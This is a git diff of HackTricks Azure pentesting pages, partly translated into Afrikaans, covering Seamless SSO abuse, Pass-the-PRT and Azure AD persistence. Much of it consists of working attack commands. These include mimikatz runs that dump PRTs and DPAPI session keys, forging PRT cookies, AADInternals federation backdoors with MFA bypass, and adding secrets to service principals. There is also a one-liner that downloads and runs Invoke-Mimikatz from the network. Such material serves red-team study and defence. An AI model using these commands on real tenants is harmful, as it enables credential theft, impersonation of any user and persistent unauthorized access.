[waardes](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically): +- `https://aadg.windows.net.nsatc.net` +- `https://autologon.microsoftazuread-sso.com` +3. **Toegang tot die Webtoepassing:** +- Besoek 'n webtoepassing wat geïntegreer is met die organisasie se AAD-domein. 'n Algemene voorbeeld is [Office 365](https://portal.office.com/). +4. **Verifikasieproses:** +- By die aanmeldskerm moet die gebruikersnaam ingevoer word, terwyl die wagwoordveld leeg gelaat word. +- Om voort te gaan, druk óf TAB óf ENTER. > [!TIP] -> This doesn't bypass MFA if enabled +> Dit omseil nie MFA as dit geaktiveer is nie -#### Option 2 without dcsync - SeamlessPass +#### Opsie 2 sonder dcsync - SeamlessPass -It's also possible to perform this attack **without a dcsync attack** to be more stealth as [explained in this blog post](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). For that you only need one of the following: +Dit is ook moontlik om hierdie aanval **sonder 'n dcsync-aanval** uit te voer om meer stil te wees soos [in hierdie blogpos verduidelik](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). Hiervoor het jy net een van die volgende nodig: -- **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). -- **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user. -- **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT -- **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method). - -Finally, with the TGT it's possible to use the tool [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) with: +- **'n Gecompromitteerde gebruiker se TGT:** Selfs al het jy nie een nie, maar die gebruiker was gecompromitteer, kan jy een kry deur die vals TGT-delegasie truuk wat in baie gereedskap geïmplementeer is, soos [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) en [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). +- **Goue Kaartjie**: As jy die KRBTGT-sleutel het, kan jy die TGT wat jy vir die aangevalde gebruiker nodig het, skep. +- **'n Gecompromitteerde gebruiker se NTLM-hash of AES-sleutel:** SeamlessPass sal met die domeinbeheerder kommunikeer met hierdie inligting om die TGT te genereer. +- **AZUREADSSOACC$ rekening NTLM-hash of AES-sleutel:** Met hierdie inligting en die gebruiker se Veiligheidsidentifiseerder (SID) om aan te val, is dit moontlik om 'n dienskaartjie te skep en met die wolk te verifieer (soos in die vorige metode uitgevoer). +Laastens, met die TGT is dit moontlik om die gereedskap [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) te gebruik met: ``` seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt ``` +Verder inligting om Firefox te laat werk met naatlose SSO kan [**gevind word in hierdie blogpos**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). -Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). +#### ~~Skep Kerberos-tickets vir slegs-cloud gebruikers~~ -#### ~~Creating Kerberos tickets for cloud-only users~~ - -If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](). +As die Active Directory-administrateurs toegang het tot Azure AD Connect, kan hulle **SID vir enige cloud-gebruiker stel**. Op hierdie manier kan Kerberos **tickets** ook **geskep word vir slegs-cloud gebruikers**. Die enigste vereiste is dat die SID 'n behoorlike [SID](). > [!CAUTION] -> Changing SID of cloud-only admin users is now **blocked by Microsoft**.\ -> For info check [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) +> Om die SID van slegs-cloud administrateurs te verander is nou **geblokkeer deur Microsoft**.\ +> Vir inligting, kyk [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) -### On-prem -> Cloud via Resource Based Constrained Delegation - -Anyone that can manage computer accounts (`AZUREADSSOACC$`) in the container or OU this account is in, it can **configure a resource based constrained delegation over the account and access it**. +### On-prem -> Cloud via Hulpbron-gebaseerde Beperkte Afvaardiging +Enigeen wat rekenaarrekeninge (`AZUREADSSOACC$`) in die houer of OU waarin hierdie rekening is, kan **'n hulpbron-gebaseerde beperkte afvaardiging oor die rekening konfigureer en dit toegang gee**. ```python python rbdel.py -u \\ -p azureadssosvc$ ``` - -## References +## Verwysings - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) - [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) - [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) -- [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) +- [TR19: Ek is in jou wolk, lees almal se e-pos - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md index b09d8a841..54ecfe399 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md @@ -2,77 +2,72 @@ {{#include ../../../banners/hacktricks-training.md}} -## What is a PRT +## Wat is 'n PRT {{#ref}} az-primary-refresh-token-prt.md {{#endref}} -### Check if you have a PRT - +### Kontroleer of jy 'n PRT het ``` Dsregcmd.exe /status ``` - -In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**. +In die SSO-toestand afdeling, moet jy die **`AzureAdPrt`** op **JA** sien.
-In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`): +In dieselfde uitvoer kan jy ook sien of die **toestel aan Azure** aangesluit is (in die veld `AzureAdJoined`):
-## PRT Cookie - -The PRT cookie is actually called **`x-ms-RefreshTokenCredential`** and it's a JSON Web Token (JWT). A JWT contains **3 parts**, the **header**, **payload** and **signature**, divided by a `.` and all url-safe base64 encoded. A typical PRT cookie contains the following header and body: +## PRT-koekie +Die PRT-koekie word eintlik **`x-ms-RefreshTokenCredential`** genoem en dit is 'n JSON Web Token (JWT). 'n JWT bevat **3 dele**, die **kop**, **payload** en **handtekening**, geskei deur 'n `.` en alles is url-veilige base64-gecodeer. 'n Tipiese PRT-koekie bevat die volgende kop en liggaam: ```json { - "alg": "HS256", - "ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383" +"alg": "HS256", +"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383" } { - "refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA", - "is_primary": "true", - "request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA" +"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA", +"is_primary": "true", +"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA" } ``` +Die werklike **Primary Refresh Token (PRT)** is ingekapsuleer binne die **`refresh_token`**, wat geënkripteer is deur 'n sleutel onder die beheer van Azure AD, wat sy inhoud ondoorgrondelik en ondekripteerbaar vir ons maak. Die veld **`is_primary`** dui die inkapseling van die primêre verfrissingsleutel binne hierdie token aan. Om te verseker dat die koekie gebind bly aan die spesifieke aanmeldsessie waarvoor dit bedoel was, word die `request_nonce` van die `logon.microsoftonline.com` bladsy oorgedra. -The actual **Primary Refresh Token (PRT)** is encapsulated within the **`refresh_token`**, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field **`is_primary`** signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the `request_nonce` is transmitted from the `logon.microsoftonline.com` page. +### PRT Koekie vloei met behulp van TPM -### PRT Cookie flow using TPM +Die **LSASS** proses sal die **KDF konteks** na die TPM stuur, en die TPM sal die **sessiesleutel** (versamel toe die toestel in AzureAD geregistreer is en in die TPM gestoor is) en die vorige konteks gebruik om 'n **sleutel** te **deriveer**, en hierdie **afgeleide sleutel** word gebruik om die **PRT koekie (JWT)** te **onderteken**. -The **LSASS** process will send to the TPM the **KDF context**, and the TPM will used **session key** (gathered when the device was registered in AzureAD and stored in the TPM) and the previous context to **derivate** a **key,** and this **derived key** is used to **sign the PRT cookie (JWT).** +Die **KDF konteks is** 'n nonce van AzureAD en die PRT wat 'n **JWT** meng met 'n **konteks** (willekeurige bytes). -The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed with a **context** (random bytes). - -Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**. +Daarom, selfs al kan die PRT nie onttrek word nie omdat dit binne die TPM geleë is, is dit moontlik om LSASS te misbruik om **afgeleide sleutels van nuwe kontekste aan te vra en die gegenereerde sleutels te gebruik om Koekies te onderteken**.
-## PRT Abuse Scenarios +## PRT Misbruik Scenario's -As a **regular user** it's possible to **request PRT usage** by asking LSASS for SSO data.\ -This can be done like **native apps** which request tokens from **Web Account Manager** (token broker). WAM pasess the request to **LSASS**, which asks for tokens using signed PRT assertion. Or it can be down with **browser based (web) flow**s where a **PRT cookie** is used as **header** to authenticate requests to Azure AS login pages. +As 'n **regte gebruiker** is dit moontlik om **PRT gebruik aan te vra** deur LSASS vir SSO-data te vra.\ +Dit kan gedoen word soos **natuurlike toepassings** wat tokens van **Web Account Manager** (token broker) aan vra. WAM stuur die versoek na **LSASS**, wat vir tokens vra met 'n ondertekende PRT-assertie. Of dit kan gedoen word met **blaaier-gebaseerde (web) vloei** waar 'n **PRT koekie** as **kop** gebruik word om versoeke na Azure AS aanmeldbladsye te verifieer. -As **SYSTEM** you could **steal the PRT if not protected** by TPM or **interact with PRT keys in LSASS** using crypto APIs. +As **SISTEEM** kan jy die **PRT steel as dit nie deur TPM beskerm word nie** of **interaksie hê met PRT sleutels in LSASS** met behulp van crypto APIs. -## Pass-the-PRT Attack Examples +## Pass-the-PRT Aanval Voorbeelde -### Attack - ROADtoken +### Aanval - ROADtoken -For more info about this way [**check this post**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken will run **`BrowserCore.exe`** from the right directory and use it to **obtain a PRT cookie**. This cookie can then be used with ROADtools to authenticate and **obtain a persistent refresh token**. - -To generate a valid PRT cookie the first thing you need is a nonce.\ -You can get this with: +Vir meer inligting oor hierdie manier [**kyk hierdie pos**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken sal **`BrowserCore.exe`** van die regte gids uitvoer en dit gebruik om 'n **PRT koekie** te **verkry**. Hierdie koekie kan dan met ROADtools gebruik word om te verifieer en 'n **volhoubare verfrissingsleutel** te **verkry**. +Om 'n geldige PRT koekie te genereer, is die eerste ding wat jy nodig het 'n nonce.\ +Jy kan dit kry met: ```powershell $TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed" $URL = "https://login.microsoftonline.com/$TenantId/oauth2/token" $Params = @{ - "URI" = $URL - "Method" = "POST" +"URI" = $URL +"Method" = "POST" } $Body = @{ "grant_type" = "srv_challenge" @@ -81,27 +76,19 @@ $Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body $Result.Nonce AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA ``` - -Or using [**roadrecon**](https://github.com/dirkjanm/ROADtools): - +Of deur [**roadrecon**](https://github.com/dirkjanm/ROADtools): ```powershell roadrecon auth prt-init ``` - -Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a new PRT (run in the tool from a process of the user to attack): - +Dan kan jy [**roadtoken**](https://github.com/dirkjanm/ROADtoken) gebruik om 'n nuwe PRT te verkry (voer die hulpmiddel uit vanaf 'n proses van die gebruiker om aan te val): ```powershell .\ROADtoken.exe ``` - As oneliner: - ```powershell Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"} ``` - -Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph: - +Dan kan jy die **gegenereerde koekie** gebruik om **tokens** te **genereer** om in te **log** met Azure AD **Graph** of Microsoft Graph: ```powershell # Generate roadrecon auth --prt-cookie @@ -109,13 +96,11 @@ roadrecon auth --prt-cookie # Connect Connect-AzureAD --AadAccessToken --AccountId ``` +### Aanval - Gebruik roadrecon -### Attack - Using roadrecon - -### Attack - Using AADInternals and a leaked PRT - -`Get-AADIntUserPRTToken` **gets user’s PRT token** from the Azure AD joined or Hybrid joined computer. Uses `BrowserCore.exe` to get the PRT token. +### Aanval - Gebruik AADInternals en 'n gelekte PRT +`Get-AADIntUserPRTToken` **kry die gebruiker se PRT-token** van die Azure AD-verbonden of Hibrid-verbonden rekenaar. Gebruik `BrowserCore.exe` om die PRT-token te kry. ```powershell # Get the PRToken $prtToken = Get-AADIntUserPRTToken @@ -123,9 +108,7 @@ $prtToken = Get-AADIntUserPRTToken # Get an access token for AAD Graph API and save to cache Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken ``` - -Or if you have the values from Mimikatz you can also use AADInternals to generate a token: - +Of as jy die waardes van Mimikatz het, kan jy ook AADInternals gebruik om 'n token te genereer: ```powershell # Mimikat "PRT" value $MimikatzPRT="MC5BWU..." @@ -153,40 +136,36 @@ $AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken # Verify access and connect with Az. You can see account id in mimikatz prt output Connect-AzAccount -AccessToken $AT -TenantID -AccountId ``` - -Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie. - +Gaan na [https://login.microsoftonline.com](https://login.microsoftonline.com), verwyder alle koekies vir login.microsoftonline.com en voer 'n nuwe koekie in. ``` Name: x-ms-RefreshTokenCredential Value: [Paste your output from above] Path: / HttpOnly: Set to True (checked) ``` - Then go to [https://portal.azure.com](https://portal.azure.com) > [!CAUTION] -> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. +> Die res moet die verstekinstellings wees. Maak seker jy kan die bladsy verfris en die koekie verdwyn nie, as dit wel gebeur, het jy dalk 'n fout gemaak en moet die proses weer deurgaan. As dit nie gebeur nie, behoort jy reg te wees. ### Attack - Mimikatz #### Steps -1. The **PRT (Primary Refresh Token) is extracted from LSASS** (Local Security Authority Subsystem Service) and stored for subsequent use. -2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md). -3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/). +1. Die **PRT (Primêre Vernuwings Teken) word uit LSASS** (Plaaslike Sekuriteitsowerheid Subsystemdiens) onttrek en gestoor vir latere gebruik. +2. Die **Sessie Sleutel word volgende onttrek**. Aangesien hierdie sleutel aanvanklik uitgereik word en dan weer deur die plaaslike toestel her-enkripteer word, vereis dit ontsleuteling met 'n DPAPI meester sleutel. Gedetailleerde inligting oor DPAPI (Data Protection API) kan in hierdie hulpbronne gevind word: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) en vir 'n begrip van die toepassing daarvan, verwys na [Pass-the-cookie attack](az-pass-the-cookie.md). +3. Na ontsleuteling van die Sessie Sleutel, word die **afgeleide sleutel en konteks vir die PRT verkry**. Hierdie is noodsaaklik vir die **skepping van die PRT koekie**. Spesifiek, die afgeleide sleutel word gebruik om die JWT (JSON Web Token) wat die koekie vorm, te teken. 'n Omvattende verduideliking van hierdie proses is deur Dirk-jan verskaf, beskikbaar [hier](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/). > [!CAUTION] -> Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\ -> However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).** +> Let daarop dat as die PRT binne die TPM is en nie binne `lsass` nie, **sal mimikatz nie in staat wees om dit te onttrek nie**.\ +> Dit sal egter moontlik wees om 'n **sleutel van 'n afgeleide sleutel uit 'n konteks** van die TPM te kry en dit te gebruik om 'n **koekie te teken (kyk opsie 3).** You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/) > [!WARNING] -> This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his. +> Dit sal nie presies werk na die Augustus 2021 regstellings om ander gebruikers se PRT tokens te verkry nie, aangesien slegs die gebruiker sy PRT kan verkry (n plaaslike admin kan nie ander gebruikers se PRTs toegang nie), maar kan syne verkry. You can use **mimikatz** to extract the PRT: - ```powershell mimikatz.exe Privilege::debug @@ -196,93 +175,76 @@ Sekurlsa::cloudap iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"' ``` - (Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)
-**Copy** the part labeled **Prt** and save it.\ -Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it. +**Kopieer** die deel gemerk **Prt** en stoor dit.\ +Onttrek ook die sessiesleutel (die **`KeyValue`** van die **`ProofOfPossesionKey`** veld) wat jy hieronder gemerk kan sien. Dit is versleuteld en ons sal ons DPAPI meester sleutels moet gebruik om dit te ontsleutel.
> [!NOTE] -> If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10. - -To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so: +> As jy nie enige PRT-data sien nie, kan dit wees dat jy **nie enige PRT's het nie** omdat jou toestel nie Azure AD-verbonden is nie of dit kan wees dat jy **'n ou weergawe** van Windows 10 gebruik. +Om die sessiesleutel te **ontsleutel** moet jy jou regte **verhoog** na **SYSTEM** om onder die rekenaar konteks te werk om die **DPAPI meester sleutel te gebruik om dit te ontsleutel**. Jy kan die volgende opdragte gebruik om dit te doen: ``` token::elevate dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect ``` -
-#### Option 1 - Full Mimikatz +#### Opsie 1 - Volledige Mimikatz -- Now you want to copy both the Context value: +- Nou wil jy beide die Context waarde kopieer:
-- And the derived key value: +- En die afgeleide sleutel waarde:
-- Finally you can use all this info to **generate PRT cookies**: - +- Laastens kan jy al hierdie inligting gebruik om **PRT koekies te genereer**: ```bash Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT] ``` -
-- Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie. - +- Gaan na [https://login.microsoftonline.com](https://login.microsoftonline.com), verwyder alle koekies vir login.microsoftonline.com en voer 'n nuwe koekie in. ``` Name: x-ms-RefreshTokenCredential Value: [Paste your output from above] Path: / HttpOnly: Set to True (checked) ``` - -- Then go to [https://portal.azure.com](https://portal.azure.com) +- Gaan dan na [https://portal.azure.com](https://portal.azure.com) > [!CAUTION] -> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. +> Die res behoort die standaardinstellings te wees. Maak seker jy kan die bladsy verfris en die koekie verdwyn nie, as dit wel gebeur, het jy dalk 'n fout gemaak en moet die proses weer deurgaan. As dit nie gebeur nie, behoort jy reg te wees. -#### Option 2 - roadrecon using PRT - -- Renew the PRT first, which will save it in `roadtx.prt`: +#### Opsie 2 - roadrecon met PRT +- Verleng eers die PRT, wat dit in `roadtx.prt` sal stoor: ```bash roadtx prt -a renew --prt --prt-sessionkey ``` - -- Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim. - +- Nou kan ons **tokens versoek** met die interaktiewe blaaiertjie met `roadtx browserprtauth`. As ons die `roadtx describe` opdrag gebruik, sien ons die toegangstoken sluit 'n MFA-eis in omdat die PRT wat ek in hierdie geval gebruik het ook 'n MFA-eis gehad het. ```bash roadtx browserprtauth roadtx describe < .roadtools_auth ``` -
-#### Option 3 - roadrecon using derived keys - -Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with: +#### Opsie 3 - roadrecon met afgeleide sleutels +Met die konteks en die afgeleide sleutel wat deur mimikatz gestort is, is dit moontlik om roadrecon te gebruik om 'n nuwe ondertekende koekie te genereer met: ```bash roadrecon auth --prt-cookie --prt-context --derives-key ``` - -## References +## Verwysings - [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/) - [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) - [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-persistence/README.md b/src/pentesting-cloud/azure-security/az-persistence/README.md index e418fb5e6..bb65dd142 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/README.md +++ b/src/pentesting-cloud/azure-security/az-persistence/README.md @@ -2,54 +2,45 @@ {{#include ../../../banners/hacktricks-training.md}} -### Illicit Consent Grant +### Illegale Toestemmingstoekenning -By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success. +Deur die standaard kan enige gebruiker 'n toepassing in Azure AD registreer. So kan jy 'n toepassing registreer (slegs vir die teiken huur) wat hoë impak toestemmings benodig met administratortoestemming (goedkeur dit as jy die admin is) - soos om e-pos namens 'n gebruiker te stuur, rolbestuur, ens. Dit sal ons toelaat om **phishing-aanvalle** uit te voer wat baie **vrugbaar** sal wees in die geval van sukses. -Moreover, you could also accept that application with your user as a way to maintain access over it. +Boonop kan jy ook daardie toepassing met jou gebruiker aanvaar as 'n manier om toegang daaroor te behou. -### Applications and Service Principals +### Toepassings en Diensbeginsels -With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application. +Met die voorregte van Toepassing Administrateur, GA of 'n pasgemaakte rol met microsoft.directory/applications/credentials/update toestemmings, kan ons kredensiale (geheime of sertifikaat) aan 'n bestaande toepassing voeg. -It's possible to **target an application with high permissions** or **add a new application** with high permissions. +Dit is moontlik om **'n toepassing met hoë toestemmings te teiken** of **'n nuwe toepassing** met hoë toestemmings toe te voeg. -An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators. - -This technique also allows to **bypass MFA**. +'n Interessante rol om by die toepassing te voeg, sou die **Privileged authentication administrator role** wees, aangesien dit toelaat om die **wagwoord te herstel** van Globale Administrators. +Hierdie tegniek laat ook toe om **MFA te omseil**. ```powershell $passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd) Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a ``` - -- For certificate based authentication - +- Vir sertifikaat-gebaseerde outentisering ```powershell Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint -ApplicationId ``` +### Federasie - Token Ondertekening Sertifikaat -### Federation - Token Signing Certificate - -With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know. - -**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service: +Met **DA bevoegdhede** op on-prem AD, is dit moontlik om **nuwe Token ondertekening** en **Token Deleksie sertifikate** te skep en in te voer wat 'n baie lang geldigheid het. Dit sal ons in staat stel om **in te teken as enige gebruiker** wie se ImuutableID ons ken. +**Voer** die onderstaande opdrag uit as **DA op die ADFS bediener(s)** om nuwe sertifikate te skep (standaard wagwoord 'AADInternals'), voeg dit by ADFS, deaktiveer outomatiese hernuwing en herbegin die diens: ```powershell New-AADIntADFSSelfSignedCertificates ``` - -Then, update the certificate information with Azure AD: - +Dan, werk die sertifikaatinligting by met Azure AD: ```powershell Update-AADIntADFSFederationSettings -Domain cyberranges.io ``` +### Federasie - Betroubare Domein -### Federation - Trusted Domain - -With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer: - +Met GA-privileges op 'n huurder, is dit moontlik om 'n **nuwe domein** toe te voeg (moet geverifieer word), sy autentikasietipe na Federated te konfigureer en die domein te **vertrou op 'n spesifieke sertifikaat** (any.sts in die onderstaande opdrag) en uitgever: ```powershell # Using AADInternals ConvertTo-AADIntBackdoor -DomainName cyberranges.io @@ -60,13 +51,8 @@ Get-MsolUser | select userPrincipalName,ImmutableID # Access any cloud app as the user Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true ``` - -## References +## Verwysings - [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md index 7fda7614d..4d12a876d 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md @@ -4,7 +4,7 @@ ## Queue -For more information check: +Vir meer inligting, kyk: {{#ref}} ../az-services/az-queue-enum.md @@ -12,8 +12,7 @@ For more information check: ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - +Hierdie toestemming laat 'n aanvaller toe om queues en hul eienskappe binne die stoorrekening te skep of te wysig. Dit kan gebruik word om ongeoorloofde queues te skep, metadata te wysig, of toegangbeheerlys (ACLs) te verander om toegang toe te laat of te beperk. Hierdie vermoë kan werksvloei ontwrig, kwaadwillige data insit, sensitiewe inligting eksfiltreer, of queue-instellings manipuleer om verdere aanvalle moontlik te maak. ```bash az storage queue create --name --account-name @@ -21,15 +20,10 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` - -## References +## Verwysings - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api - https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git 